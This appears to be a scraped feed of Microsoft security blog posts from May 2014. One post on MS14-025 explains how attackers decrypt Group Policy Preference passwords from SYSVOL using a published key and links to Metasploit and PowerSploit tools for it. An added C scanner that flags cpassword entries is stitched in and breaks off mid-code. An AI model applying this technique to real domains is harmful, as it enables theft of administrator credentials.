<p>Today I am pleased to share we have taken our security update process one step further with the release of &ldquo;<a href="http://mybulletins.technet.microsoft.com/">myBulletins</a>.&rdquo; <a href="/b/security/archive/2014/05/01/new-mybulletins-tool-delivering-security-bulletins-tailored-for-your-organization.aspx">Read more</a></p>
...(<a href="http://blogs.technet.com/b/security/archive/2014/05/28/new-mybulletins-tool-delivering-security-bulletins-tailored-for-your-organization.aspx">read more</a>)

Meet myBulletins: an online security bulletin customization service
http://blogs.technet.com/b/msrc/archive/2014/05/28/meet-mybulletins-an-online-security-bulletin-customization-service.aspx
Wed, 28 May 2014 15:00:00 GMT (MSRC Team)
<p>Microsoft is committed to promoting a safer, more trusted Internet, and providing monthly security updates is one of the ways our customers keep their devices and connections to the Internet more secure. Packaging updates together into a monthly bulletin cycle stems from customer feedback and offers a predictable way to help protect them against newly discovered threats.</p>
<p>Today, we are excited to introduce <a href="http://mybulletins.technet.microsoft.com/">myBulletins</a>, a new online security bulletin customization service.</p>
<p>We&rsquo;ve also created myBulletins based on your feedback. It&rsquo;s a customizable online service that offers IT professionals a personalized list of the Microsoft security bulletins that matter most to their organization. It is easy to use: simply visit <a href="http://mybulletins.technet.microsoft.com/">myBulletins</a>, log in to your Microsoft account, select the products and versions running in your environment, and a customized list of only those security bulletins is displayed.</p>
<p>To develop myBulletins, we asked if there was anything we could do differently to make applying security bulletins easier. We recognize that not all of the products covered in the monthly security bulletins may be operating in your environment. You shared that you needed the ability to cut through complexity and make decisions quickly. You wanted help identifying the information that is most relevant to your organization. We heard you and acted on your feedback.</p>
<p>Starting today, myBulletins will enable you to quickly find security bulletins using advanced search and filtering options. The online service prioritizes security bulletin deployment by release date, severity, and reboot requirements to aid in decision making. The service provides a dynamic list in a customizable dashboard that can be edited at any time, as well as downloaded to a Microsoft Excel report.</p>
<p>myBulletins is our way to deliver on the promise to make applying security updates as seamless as possible.</p>
<p>There are three simple steps to get started:</p>
<ul>
<li><p>Step 1: Visit <a href="http://mybulletins.technet.microsoft.com/">myBulletins</a> and sign in with your Microsoft account</p></li>
<li><p>Step 2: Build your profile by selecting the Microsoft products you want to see in your dashboard</p></li>
<li><p>Step 3: View your personalized dashboard</p></li>
</ul>
<p>We know that customers are best protected when <span style="text-decoration:underline;">all</span> applicable updates are applied, which is why we think you should create a profile, use it, and let us know what you think by using the <a href="https://lab.msdn.microsoft.com/mailform/contactus.aspx?refurl=http%3a%2f%2ftechnet.microsoft.com%2fen-us%2fsecurity%2fbb291012.aspx&amp;loc=en-us">site feedback</a> link. Our ears are open and we look forward to hearing about your myBulletins experience.</p>
<p>Tracey Pretorius<br />Director, Microsoft Trustworthy Computing</p>

Learn How to Test Apps for Accessibility on the Windows App Builders Blog
http://blogs.msdn.com/b/accessibility/archive/2014/05/27/learn-how-to-test-apps-for-accessibility-on-the-windows-app-builders-blog.aspx
Tue, 27 May 2014 22:10:58 GMT (Daniel Hubbell - MSFT)
<p>When developers design apps that are accessible, everyone can benefit. Over on the Windows App Builders Blog, a new story explains how developers can test the accessibility of their apps and check for key features, such as clearly visible text. Whether...</p>
(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/27/learn-how-to-test-apps-for-accessibility-on-the-windows-app-builders-blog.aspx">read more</a>)

Is your child graduating to a new digital device?
http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/27/is-your-child-graduating-to-a-new-digital-device.aspx
Tue, 27 May 2014 15:04:00 GMT (Eve Blakemore)
<p>It&rsquo;s graduation time, and smartphones, tablets, gaming consoles, and laptops are tops on many kids&rsquo; wish lists.
Whether your child is graduating from preschool or college, it&rsquo;s never too late to talk with them about online safety before you hand over the new device.</p>
<ul>
<li>Set clear rules for young children about who they can talk to, text, or play games with.</li>
<li>With older kids, discuss online bullying, sexting, and the dangers of using a phone while driving.</li>
<li>Have kids lock all devices and accounts with a PIN or strong password, and remind them to keep their passwords secret&mdash;even from best friends.</li>
<li>Talk to kids about limiting the personal information they share to close friends only.</li>
<li>Consider disabling the location services on your young child&rsquo;s devices; at the very least, turn it off for any camera.</li>
<li>Teach tweens and teens to use location-based services cautiously.</li>
</ul>
<p>For more guidelines on kids and online safety, see <a href="http://www.microsoft.com/security/family-safety/gift-checklist.aspx">Digital gift-giving checklist</a>, and <a href="http://go.microsoft.com/?linkid=9842695">download a printable version of the checklist</a> (PDF, 186 KB).</p>

SAFECode on Confidence: One Size Does Not Fit All
http://blogs.msdn.com/b/sdl/archive/2014/05/23/safecode-one-size-does-not-fit-all.aspx
Fri, 23 May 2014 22:00:00 GMT (SDL Team)
<p>In a recent post by SAFECode, a non-profit organization of software vendors dedicated to increasing trust in information and communications technology products by improving security and assurance methods, Eric Baize of EMC and Steve Lipner of Microsoft discuss the challenging subject of trustworthiness of acquired software. How a customer gains confidence in acquired software is a frequently asked question of developers. The latest SAFECode blog discusses three approaches that a customer can use to assess the security of acquired software with varying levels of confidence.</p>
<p><a href="http://blog.safecode.org/?p=240">http://blog.safecode.org/?p=240</a></p>

The Role of Big Data in Increasing Security and Resilience to Catastrophic Events
http://blogs.technet.com/b/security/archive/2014/05/23/the-role-of-big-data-in-increasing-security-and-resilience-to-catastrophic-events.aspx
Fri, 23 May 2014 17:35:00 GMT (Paul Nicholas - TwC)
<p>Technology is changing the world around us, and creating new opportunities to solve old problems. The number of Internet users, and the devices they connect to the Internet, will continue to grow rapidly in the next decade. The Internet of Things will take root in our everyday lives, and create new and powerful data streams.</p>
<p>This &ldquo;big data&rdquo; has the potential to be of tremendous value in many aspects of business and everyday life. One potential benefit can be helping to mitigate catastrophic events by enhancing preparedness, reducing the impact of catastrophic events, increasing the efficiency of humanitarian response, and enabling the more rapid recovery of business and livelihoods.</p>
<p>Over the past few years Microsoft has looked at how we could use our passion for innovative technology to make a difference in people&#39;s everyday lives, so supporting <a href="http://www.bing.com/videos?mkt=en-us&amp;vid=096891fa-5170-42c0-a47a-72e48dce5254&amp;from=sharepermalink-link">humanitarian relief and disaster management efforts</a> has become part of our commitment to developing technology solutions, tools, and practices that can foster social and economic change. Whether it is by deploying emergency connectivity kits, enabling communications for aid workers and first responders as we recently did in the Philippines, or developing mapping tools and imagery to enhance response organizations&rsquo; analysis and resource deployment planning, we believe technology can truly make a difference.
<a href="/b/security/archive/2014/05/23/the-role-of-big-data-in-increasing-security-and-resilience-to-catastrophic-events.aspx">Read more</a></p>
...(<a href="http://blogs.technet.com/b/security/archive/2014/05/23/the-role-of-big-data-in-increasing-security-and-resilience-to-catastrophic-events.aspx">read more</a>)

Protecting Data and Privacy in the Cloud: Part 1
http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/22/protecting-data-and-privacy-in-the-cloud.aspx
Thu, 22 May 2014 15:53:14 GMT (Trusted Cloud Team)
<p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong></p>
<p>For organizations looking to reap the benefits of cloud computing, it is important to know how a service provider is using customer data stored in the cloud and to trust that the service provider will only use their data in a way that is consistent with customer expectations. <a target="_blank" href="/b/trustworthycomputing/archive/2014/05/21/protecting-data-and-privacy-in-the-cloud.aspx">Read more &gt;&gt;</a></p>
...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/22/protecting-data-and-privacy-in-the-cloud.aspx">read more</a>)

What’s new with Windows Phone 8.1?
http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/22/what-s-new-with-windows-phone-8-1.aspx
Thu, 22 May 2014 15:34:00 GMT (Eve Blakemore)
<p>Windows Phone 8.1 includes features that let you browse the web and use location-aware apps and other apps without losing control of your privacy and security.</p>
<h1>Turn location services on or off</h1>
<p>Location services can improve your experience in many different applications, from restaurant finders to social networks. If you don&rsquo;t want to share your location, you can turn location services off.</p>
<p><strong>To turn location services on or off</strong></p>
<ol>
<li>In the <a href="http://www.windowsphone.com/en-US/how-to/wp8/settings-and-personalization/wheres-the-app-list" target="_blank">App list</a>, tap <strong>Settings</strong> &gt; <strong>Location</strong>.</li>
<li>Turn <strong>Location services</strong> on or off.</li>
</ol>
<h1>See when an app is accessing your location information</h1>
<p>If you want to use location services and also see when an app is accessing your phone&rsquo;s location, you can turn on the Location icon.</p>
<p><strong>To make sure this icon is turned on</strong></p>
<ol>
<li>In the <a href="http://www.windowsphone.com/en-us/how-to/wp8/basics/wheres-the-app-list" target="_blank">App list</a>, tap <strong>Settings</strong> &gt; <strong>Location</strong>.</li>
<li>Select the <strong>Show icon</strong> check box.</li>
</ol>
<p><strong>Note:</strong> Choosing not to display the Location icon doesn't turn off location services. It simply hides the icon to reduce clutter on your phone's status bar.</p>
<h1>Change privacy settings on your mobile browser</h1>
<p>Internet Explorer 11 for Windows Phone makes it easy to adjust settings. You can delete your Internet Explorer search history and use the SmartScreen Filter to help protect against unsafe websites. You can also set Internet Explorer to send a Do Not Track request to websites you visit to signal that you don't want that website to track your browsing.</p>
<h1>Privacy settings in Cortana (the new personal assistant for Windows Phone)</h1>
<p><a href="http://www.windowsphone.com/en-US/how-to/wp8/apps/meet-cortana">Cortana</a> is the new digital assistant for Windows Phone 8.1 that can help with tasks and offer reminders, suggestions, and more. The more Cortana knows about you, the more efficient she can be.</p>
<p><strong>Note:</strong> Cortana is only available on phones with Windows Phone 8.1, and only in <a href="http://windowsphone.com/en-US/how-to/wp8/basics/feature-and-service-availability">some countries/regions</a>. Check to see <a href="http://windowsphone.com/en-US/how-to/wp8/basics/which-version-of-windows-phone-do-i-have">which software version you have</a>.</p>
<h1>Settings you can change in Cortana to help control your privacy</h1>
<ul>
<li>If Cortana is on, you can control detection of tracking info in email messages.</li>
<li>Regardless of whether Cortana is on or off, you can choose whether to send your browsing history to Microsoft to help improve our services and products.</li>
<li>If Cortana is on, you can control whether Cortana uses information from your Facebook account for personalization.</li>
</ul>
<p>To understand how Cortana and Bing work with Facebook, see <a href="http://www.windowsphone.com/en-US/how-to/wp8/apps/cortana-and-my-privacy-faq">Cortana and my privacy FAQ</a>.</p>
<p>For more information about these and other settings, see <a href="http://www.microsoft.com/security/online-privacy/windows-phone.aspx">Privacy in Windows Phone 8.1</a>.</p>

Which Countries/Regions Encountered the Most Malware in 2013?
http://blogs.technet.com/b/security/archive/2014/05/21/which-countries-regions-encountered-the-most-malware-in-2013.aspx
Wed, 21 May 2014 16:01:02 GMT (Tim Rains - Microsoft)
<p>Data released this month from the <a href="http://www.microsoft.com/sir">Microsoft Security Intelligence Report</a> volume 16 (SIRv16) helps us understand which countries/regions encountered the most malware in 2013.</p>
<p>The
&ldquo;encounter rate&rdquo; is the percentage of computers running Microsoft real-time security software that report detecting malware, or report detecting a specific threat or family, during a period. Most of these encounters are from systems running Microsoft Security Essentials or Windows Defender (on Windows 8). The chart below provides a breakdown of the top 10 locations with the highest malware encounter rates. <a href="/b/security/archive/2014/05/21/which-countries-regions-encountered-the-most-malware-in-2013.aspx">Read more</a></p>
...(<a href="http://blogs.technet.com/b/security/archive/2014/05/21/which-countries-regions-encountered-the-most-malware-in-2013.aspx">read more</a>)

Accessibility and Technology Take Center Stage at the 2014 Ability Summit
http://blogs.msdn.com/b/accessibility/archive/2014/05/20/accessibility-and-technology-take-center-stage-at-the-2014-ability-summit.aspx
Tue, 20 May 2014 21:31:22 GMT (Daniel Hubbell - MSFT)
<p>The following blog post was written by Paul Nyhan, a staff writer with the Microsoft Accessibility Blog. Paul is a 20-year journalism veteran who has written extensively about disability issues.</p>
<p>When Microsoft held its first Ability Summit...</p>
(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/20/accessibility-and-technology-take-center-stage-at-the-2014-ability-summit.aspx">read more</a>)

Transfer your files to a new computer for free
http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/20/transfer-your-files-to-a-new-computer-for-free.aspx
Tue, 20 May 2014 16:10:00 GMT (Eve Blakemore)
<p>Product support for Windows XP ended in April. Moving forward, this means that Windows XP-based systems will not receive security updates.</p>
<p><a href="http://amirunningxp.com/">Find out if your computer is running Windows XP</a>. If it is, you might be able to upgrade your computer, or buy a new one.</p>
<h1>If you buy a new computer, learn how to move your files, photos, and more for free.</h1>
<p>We've worked with Laplink to provide you with free data transfer. Laplink PCmover Express for Windows XP is an easy way to move your files, settings, and user profiles from your old computer running Windows XP to your new PC.</p>
<p><a href="http://www.microsoft.com/windows/en-us/xp/transfer-your-data.aspx?ocid=XPEOS_SOC_TW_POST_TUESTIP&amp;linkId=7918786">Download the free version of PCmover Express to get started</a></p>

Establishing Trust in Our Data-Centric World
http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/16/establishing-trust-in-our-data-centric-world.aspx
Fri, 16 May 2014 22:04:43 GMT (Trusted Cloud Team)
<p><strong>By Peter Cullen, General Manager, Trustworthy Computing</strong></p>
<p>More and more, we are becoming a data-driven society, in which governments and industry have access to increasing volumes of information through consumer interactions online. A recent <a href="http://www.whitehouse.gov/sites/default/files/docs/big_data_privacy_report_may_1_2014.pdf" target="_blank">White House report</a> on &ldquo;Big Data&rdquo; demonstrates the broad recognition of related privacy concerns which, if not managed correctly, may outweigh the benefits we can derive from this wealth of information.
<a href="/b/trustworthycomputing/archive/2014/05/15/establishing-trust-in-our-data-centric-world.aspx" target="_blank">Read more &gt;&gt;</a></p>
...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/16/establishing-trust-in-our-data-centric-world.aspx">read more</a>)

May 2014 Security Bulletin Webcast and Q&A
http://blogs.technet.com/b/msrc/archive/2014/05/16/may-2014-security-bulletin-webcast-and-q-amp-a.aspx
Fri, 16 May 2014 16:30:00 GMT (Dustin C. Childs)
<p>Today we published the May 2014 Security Bulletin Webcast <a href="http://blogs.technet.com/b/msrc/p/may-2014-security-bulletin-q-a.aspx">Questions &amp; Answers page</a>. We answered 17 questions in total, with the majority focusing on the update for SharePoint (<a href="https://technet.microsoft.com/library/security/ms14-022">MS14-022</a>), Group Policy (<a href="https://technet.microsoft.com/library/security/ms14-025">MS14-025</a>) and Internet Explorer (<a href="https://technet.microsoft.com/library/security/ms14-029">MS14-029</a>).</p>
<p>Here is the <a href="http://www.youtube.com/v/LKBwbueqBKM?version=3&amp;hl=en_US">video replay</a>.</p>
<p>We invite you to join us for the next scheduled webcast on Wednesday, June 11, 2014, at 11 a.m. PDT (UTC -7), when we will go into detail about the June bulletin release and answer your bulletin deployment questions live on the air.</p>
<p>You can register to attend the webcast at the link below:</p>
<p><b>Date: Wednesday, June 11, 2014<br />Time: 11:00 a.m. PDT (UTC -7)<br />Register: </b><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572980&amp;Culture=en-US"><b>Attendee Registration</b></a></p>
<p>I look forward to seeing you next month.</p>
<p>Thanks,<br /><a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br />Group Manager, Response Communications<br />Microsoft Trustworthy Computing</p>

Cybersecurity Report: Perspectives from Abroad
http://blogs.technet.com/b/security/archive/2014/05/15/cybersecurity-report-perspectives-from-abroad.aspx
Thu, 15 May 2014 21:40:14 GMT (Tim Rains - Microsoft)
<p>Each time we publish our <a href="http://www.microsoft.com/sir">Microsoft Security Intelligence Report</a>, I have an opportunity to visit a handful of countries/regions to meet with customers, partners and media to share the latest findings. The report is designed to help our customers, partners, and the broader cybersecurity community understand the tools, tactics and threats posed by cybercriminals.
This knowledge is essential for Information Technology and security professionals trying to better protect themselves and their organizations from cyber-attacks.</p> <p>But don&rsquo;t take our word for it.&nbsp; Check out this video to hear perspectives on the value it brings from several of the people we had an opportunity to meet with in various parts of the world.&nbsp; <a href="/b/security/archive/2014/05/15/cybersecurity-report-perspectives-from-abroad.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/05/15/cybersecurity-report-perspectives-from-abroad.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3629835&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft Security Intelligence Report Volume 16Global EventSIRv16 At Globsec 2014, Cybersecurity takes its place on the international stage http://blogs.technet.com/b/security/archive/2014/05/15/at-globsec-2014-cybersecurity-takes-its-place-on-the-international-stage.aspxThu, 15 May 2014 16:03:34 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:b66974a2-9c39-4161-b7fb-f1fc14494c03Paul Nicholas - TwC0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3629736http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3629736http://blogs.technet.com/b/security/archive/2014/05/15/at-globsec-2014-cybersecurity-takes-its-place-on-the-international-stage.aspx#comments<p>Yesterday, I participated in the opening remarks at this year&rsquo;s <a href="http://www.globsec.org/globsec2014/conference">GLOBSEC Bratislava Global Security Forum</a>, one of the largest foreign policy and security conferences in Europe.&nbsp; In my remarks I noted that at this year&rsquo;s conference, much of the online world was included in traditional security topics such as global power shifts, military capabilities, and economic concerns.</p> <p>The increased focus on cybersecurity is not a surprise, as countries today are increasingly dependent on 
technology for the core functions of their economy, defense, safety, and public healthcare. As a result, governments are under more pressure to develop and maintain capabilities for defense in cyberspace and reduce the risk to critical infrastructure. In the past year, we have seen an unprecedented number of countries, big and small, try to address those concerns by developing national cybersecurity strategies, proposing legislation to try and secure their core assets, and increase their spending in cyber warfare &ndash; for the first time investment in offensive capabilities has been openly talked about. <a href="/b/security/archive/2014/05/15/at-globsec-2014-cybersecurity-takes-its-place-on-the-international-stage.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/05/15/at-globsec-2014-cybersecurity-takes-its-place-on-the-international-stage.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3629736&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">GLOBSEC Bratislava Global Security ForumGSSDGlobal Security Strategy &amp; Diplomacy Security Trends in Cloud Computing Part 4: Public sectorhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/05/15/security-trends-in-cloud-computing-part-4-public-sector.aspxThu, 15 May 2014 15:57:08 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:eb5d877c-3b0f-40f3-99dd-d924d0ef8023Trusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>In the first three posts in this series, we examined data from the <a href="/b/trustworthycomputing/archive/2014/04/29/security-trends-in-cloud-computing-part-1-financial-services.aspx" target="_blank">financial services</a>, <a href="/b/trustworthycomputing/archive/2014/05/01/security-trends-in-cloud-computing-part-2-addressing-data-challenges-in-healthcare.aspx" target="_blank">healthcare </a>and <a 
href="/b/trustworthycomputing/archive/2014/05/13/security-trends-in-cloud-computing-part-3-retail-sector.aspx" target="_blank">retail </a>industries, and the potential security benefits that could be derived by adopting cloud computing.&nbsp; Today we&rsquo;ll wrap up the series with a look at cloud security trends in the public sector.&nbsp;&nbsp; <a href="/b/trustworthycomputing/archive/2014/05/13/security-trends-in-cloud-computing-part-4-public-sector.aspx" target="_blank">Read more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/15/security-trends-in-cloud-computing-part-4-public-sector.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3629608&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicescloud securityAdrienne HallCloudTrustBig Dataprivacy and reliabilityITTechnologycloud trust studySecurity ResearchSecurityCloud Computingcloud servicesTrustworthy ComputingMicrosoftpersonal dataDataPrivacyMicrosoft Cloud Solutions 5 ways to protect your Microsoft accounthttp://blogs.msdn.com/b/securitytipstalk/archive/2014/05/15/5-ways-to-protect-your-microsoft-account.aspxThu, 15 May 2014 15:54:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10522795Eve Blakemore9http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10522795http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/15/5-ways-to-protect-your-microsoft-account.aspx#comments<p>Your <a href="http://windows.microsoft.com/en-us/windows-8/microsoft-account-tutorial">Microsoft account</a> (formerly your Windows Live ID) is the combination of an email address and a password that you use to sign in to services such as Xbox LIVE and Outlook.com, as well as devices such as Windows Phone and computers running Windows 8.</p> <h1>A Microsoft account is free and you can use it to:</h1> <ul> <li>Purchase apps from the Windows Store</li> <li>Back up all your data using free cloud storage</li> <li>Keep all your devices, 
photos, friends, games, settings, music, up to date and in sync.</li> </ul> <h1>5 ways to help protect your Microsoft account</h1> <ol> <li><a href="https://www.microsoft.com/security/pc-security/password-checker.aspx">Create a strong password</a>. Strong passwords use a combination of uppercase and lowercase letters, numerals, punctuation marks, and symbols. The longer the better, and don&rsquo;t use personal information (such as a pet&rsquo;s name, nickname, or driver&rsquo;s license number) that can be easily guessed.</li> <li><a href="http://www.microsoft.com/security/pc-security/protect-passwords.aspx">Protect your password</a>. Don&rsquo;t use the same password you use on other sites, and remember to change your Microsoft account password (as well as other passwords) regularly. Watch out for email social engineering scams designed to trick you into turning over your password to a cybercriminal.</li> <li><a href="https://account.live.com/proofs/Manage">Enable two-step verification</a>. Two-step verification uses two ways to verify your identity whenever you sign in to your Microsoft account. Two-step verification is optional, but we recommend that you use it. <a href="http://windows.microsoft.com/en-us/windows/two-step-verification-faq">Learn how to turn it on</a>.</li> <li><a href="http://windows.microsoft.com/en-us/windows-live/account-security-password-information">Make sure the security information associated with your account is current</a>. If the alternate email address or phone number you&rsquo;ve given us changes, update the settings of your account so that we can contact you if there&rsquo;s a problem.</li> <li><a href="http://www.microsoft.com/security/online-privacy/phishing-scams.aspx">Watch out for phishing scams</a>. If you receive an email message about the security of your Microsoft account, it could be a&nbsp;<a href="http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx">phishing scam</a>. 
Don&rsquo;t click links in any messages unless you trust or check with the sender.&nbsp;</li> </ol> <p>Don&rsquo;t have a Microsoft account yet? See <a href="http://windows.microsoft.com/en-us/windows-live/sign-up-create-account-how">How do I sign up for a Microsoft account?</a></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10522795" width="1" height="1">fraudid theftphishinge-mailcybersecuritycybersafetye-mail scamscybercriminalspasswordsemailemail scamsMicrosoftMicrosoft Accounttwo-step verificationWindows Store A Mother with Hearing Loss Is About to Learn about Microsoft’s New Accessibility Tools http://blogs.msdn.com/b/accessibility/archive/2014/05/15/a-mother-with-hearing-loss-is-about-to-learn-about-microsoft-s-new-accessibility-tools.aspxThu, 15 May 2014 14:40:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10524717Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10524717http://blogs.msdn.com/b/accessibility/archive/2014/05/15/a-mother-with-hearing-loss-is-about-to-learn-about-microsoft-s-new-accessibility-tools.aspx#commentsThe following blog post was written by Paul Nyhan, a staff writer with the Microsoft Accessibility Blog. Paul is a 20-year journalism veteran who has written extensively about disability issues. 
----- Stephanie Radecki has been using Microsoft products...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/15/a-mother-with-hearing-loss-is-about-to-learn-about-microsoft-s-new-accessibility-tools.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10524717" width="1" height="1"> MS14-025: An Update for Group Policy Preferenceshttp://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspxTue, 13 May 2014 18:46:06 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:84afb7e4-c4e6-4633-8512-b799d754b2f6SRD Blog Author0<p>Today, we released an update to address a vulnerability in Group Policy Preferences (<a href="http://technet.microsoft.com/security/bulletin/ms14-025">MS14-025</a>). Group Policy Preferences was an addition made to Group Policy to extend its capabilities. Among other things, Group Policy Preferences allows an administrator to configure:</p> <ul> <li>Local administrator accounts (name of the account, account password, etc)</li> <li>Configure a service or scheduled task (allowed to specify alternate credentials to run as)</li> <li>Mount network drives when a user logs in (allowed to specify alternate credentials to connect with)</li> </ul> <p>Group Policy Preferences are distributed just like normal group policy: An XML file containing the settings is written to the SYSVOL share of the domain controllers, and computers periodically query the SYSVOL share (authenticating to it using their computer account) for updates to the group policy.</p> <p>Several of the Group Policy Preferences allow credentials to be specified. When this option is used, the password is symmetrically encrypted using a static key and written to the XML file along with the rest of the settings. What is this key you ask? 
It turns out, we document it on MSDN: <a href="http://msdn.microsoft.com/en-us/library/cc422924.aspx">http://msdn.microsoft.com/en-us/library/cc422924.aspx</a>.</p> <p>If an attacker is able to get access to the SYSVOL share (which is open to all authenticated users, so a malicious or spear-phished employee will have access to it) and obtain the AES encryption key used to encrypt/decrypt passwords set with GPP (which we document on MSDN), the attacker will be able to obtain the credentials set with GPP.</p> <p>Microsoft has observed that Group Policy Preferences abuse is one of the most common tactics used by attackers to elevate permissions in a domain. Multiple toolkits used by attackers, such as Metasploit (<a href="http://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp">http://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp</a>) and PowerSploit (<a href="https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1">https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1</a>), provide easy-to-use methods for retrieving and decrypting GPP passwords. In the worst-case scenario, companies use Domain Administrator credentials in their Group Policy Preference accounts, resulting in a full domain compromise as soon as the attacker is able to access the SYSVOL share (and decrypt the passwords using the documented key).</p> <p>Microsoft has released an update to change the behavior for this issue, but companies using GPP need to take action. Microsoft has removed the ability to create or modify any Group Policy which contains a Group Policy Preference that specifies account credentials. The only action that can be performed on such a Group Policy is &ldquo;delete&rdquo;. Note that Microsoft is not automatically disabling these Group Policies because we do not want to disrupt existing environments which rely on this feature. 
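</p> <p>As an added example (not one of the Microsoft scripts this post describes, and not code from the post), the C program below performs the same kind of search as Enum-SettingsWithCpassword in a form that compiles anywhere: it reads a Group Policy Preference XML file copied from SYSVOL (Groups.xml, Services.xml, ScheduledTasks.xml, Drives.xml, DataSources.xml or Printers.xml) and reports every element that still carries a cpassword attribute, the account it applies to, and whether the value is empty. It detects and nothing more; it does not decrypt. The SAMPLE_GROUPS_XML document, its account names and its placeholder ciphertext are constructed for this example.</p>

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_FINDINGS 64

/* One cpassword occurrence found in a GPP XML document. */
typedef struct {
    char element[32];   /* start tag carrying the attribute, normally "Properties" */
    char account[128];  /* userName / accountName / runAs of that element, or "" */
    size_t value_len;   /* length of the cpassword value; 0 means it was cleared */
} Finding;

/* Constructed sample, not a real SYSVOL file: one stored password, one cleared. */
static const char SAMPLE_GROUPS_XML[] =
    "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
    "<Groups>\n"
    "  <User name=\"LocalAdmin\">\n"
    "    <Properties action=\"U\" newName=\"\" description=\"\"\n"
    "      cpassword=\"CONSTRUCTED_CIPHERTEXT_PLACEHOLDER\" changeLogon=\"0\"\n"
    "      userName=\"LocalAdmin\"/>\n"
    "  </User>\n"
    "  <User name=\"Helpdesk\">\n"
    "    <Properties action=\"U\" cpassword=\"\" userName=\"Helpdesk\"/>\n"
    "  </User>\n"
    "</Groups>\n";

/* Pointer to the first character of attr's value inside the start tag [tag, tag_end),
 * or NULL. Requires whitespace before the name and =" after it. */
static const char *find_attr(const char *tag, const char *tag_end, const char *attr)
{
    size_t alen = strlen(attr);
    const char *p = tag;
    while ((p = strstr(p, attr)) != NULL && p < tag_end) {
        int ws = p > tag && strchr(" \t\r\n", p[-1]) != NULL;
        if (ws && p[alen] == '=' && p[alen + 1] == '"')
            return p + alen + 2;
        p += alen;
    }
    return NULL;
}

/* Scan a GPP XML document and fill `out` with up to `max` findings.
 * Returns the number of elements carrying a cpassword attribute. */
int scan_gpp_xml(const char *xml, Finding *out, int max)
{
    static const char *const owners[] = { "userName", "accountName", "runAs", "username" };
    int n = 0;
    const char *lt = xml;
    while (n < max && (lt = strchr(lt, '<')) != NULL) {
        const char *gt = strchr(lt, '>');
        if (!gt) break;
        const char *pw = find_attr(lt, gt, "cpassword");
        if (pw) {
            Finding *f = &out[n++];
            memset(f, 0, sizeof *f);
            size_t i = 0;   /* element name: from '<' up to whitespace, '/' or '>' */
            for (const char *t = lt + 1; t < gt && !strchr(" \t\r\n/", *t) && i < sizeof f->element - 1; t++)
                f->element[i++] = *t;
            const char *q = memchr(pw, '"', (size_t)(gt - pw));
            f->value_len = q ? (size_t)(q - pw) : 0;
            for (size_t k = 0; k < sizeof owners / sizeof owners[0] && !f->account[0]; k++) {
                const char *v = find_attr(lt, gt, owners[k]);
                const char *vq = v ? memchr(v, '"', (size_t)(gt - v)) : NULL;
                if (vq) {
                    size_t len = (size_t)(vq - v);
                    if (len >= sizeof f->account) len = sizeof f->account - 1;
                    memcpy(f->account, v, len);
                    f->account[len] = '\0';
                }
            }
        }
        lt = gt + 1;
    }
    return n;
}

/* Slurp a file into a NUL-terminated buffer (caller frees); NULL on error. */
static char *read_file(const char *path)
{
    FILE *fp = fopen(path, "rb");
    if (!fp) return NULL;
    fseek(fp, 0, SEEK_END);
    long sz = ftell(fp);
    rewind(fp);
    char *buf = sz >= 0 ? malloc((size_t)sz + 1) : NULL;
    if (buf && fread(buf, 1, (size_t)sz, fp) == (size_t)sz) buf[sz] = '\0';
    else { free(buf); buf = NULL; }
    fclose(fp);
    return buf;
}

int main(int argc, char **argv)
{
    char *owned = argc > 1 ? read_file(argv[1]) : NULL;
    if (argc > 1 && !owned) { perror(argv[1]); return 2; }
    const char *label = argc > 1 ? argv[1] : "(built-in sample)";
    Finding found[MAX_FINDINGS];
    int n = scan_gpp_xml(owned ? owned : SAMPLE_GROUPS_XML, found, MAX_FINDINGS), stored = 0;
    for (int i = 0; i < n; i++) {
        stored += found[i].value_len > 0;
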